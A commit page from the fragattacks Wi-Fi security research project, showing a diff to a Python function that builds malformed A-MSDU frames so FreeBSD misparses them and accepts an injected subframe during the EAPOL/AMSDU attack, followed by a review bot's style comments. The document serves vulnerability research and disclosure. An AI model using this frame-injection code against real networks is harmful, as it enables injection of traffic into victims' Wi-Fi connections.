fragattacks: updated freebsd_create_eapolmsdu

Mathy Vanhoef 2020-05-29 02:37:41 +04:00 committed by Mathy Vanhoef
parent 9e068ad969
commit 75b8ea9c54


@ -39,25 +39,27 @@ def log_level2switch(options):
elif options.debug >= 1: return ["-d", "-K"] elif options.debug >= 1: return ["-d", "-K"]
return ["-K"] return ["-K"]
def freebsd_create_eapolmsdu(src, dst, payload): def freebsd_create_eapolmsdu(src, dst, toinject):
""" """
FreeBSD doesn't properly parse EAPOL/MSDU frames for some reason. FreeBSD doesn't properly parse A-MSDU frames that start with an
It's unclear why. But this code puts the length and addresses at LLC/SNAP header. This is problematic when performing the EAPOL/AMSDU
the right positions so FreeBSD will parse the A-MSDU frame attack. Details why this happens are unclear. To better understand
successfully, so that we can even attack bad implementations. how the frames are parsed, see docs/freebsd_amsdu_bug.odt
""" """
# EAPOL and source address. I don't think the value "\x00\06" is important # Subframe 1: LLC/SNAP for EAPOL. The X's will be part of the first subframe.
rawmac = bytes.fromhex(src.replace(':', '')) rawmac = bytes.fromhex(src.replace(':', ''))
prefix = raw(LLC()/SNAP()/EAPOL()) + b"\x00\x06" + rawmac prefix = raw(LLC()/SNAP()/EAPOL()) + b"XXXXXXXX"
# Length followed by the payload # Subframe 1: content will be the X's (excluding the first 6 bytes). The actual
payload = create_msdu_subframe(src, dst, payload) # ethernet payload length will be payload_len - 16 due to parsing bugs.
payload = prefix + struct.pack(">I", len(payload)) + raw(payload) payload_len = 17
total_len = payload_len + 6 + 6 + 2
padding_len = 4 - (total_len % 4) if total_len % 4 != 0 else 0
payload = prefix + struct.pack(">H", payload_len) + payload_len * b"X" + padding_len * b"Y"
# Put the destination MAC address in the "right" place # Subframe 2: we can now append it normally
rawmac = bytes.fromhex(dst.replace(':', '')) payload += raw(create_msdu_subframe(src, dst, toinject))
payload = payload[:16] + rawmac[:4] + payload[20:]
return payload return payload
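Review bot: The padding line `padding_len = 4 - (total_len % 4) if total_len % 4 != 0 else 0` computes `total_len % 4` twice and hides the intent in a special case; the single expression `padding_len = (-total_len) % 4` gives the same 0–3 result for the 4-byte subframe alignment. The constants `payload_len = 17` and the `6 + 6 + 2` in `total_len` are unexplained magic numbers — I'd bind the subframe header size to a named value (dst + src + length field) and state in the comment why 17 was chosen, since the existing comment only says the effective length becomes `payload_len - 16`. The docstring also gives no parameter contract; I'd add that `src` and `dst` are colon-separated MAC strings (both are passed through `replace(':', '')`), that `toinject` is the scapy layer forwarded unchanged to `create_msdu_subframe`, and that the return value is the raw bytes of the two-subframe A-MSDU body. The function ends inside the hunk at `return payload`, so the whole body is under review here.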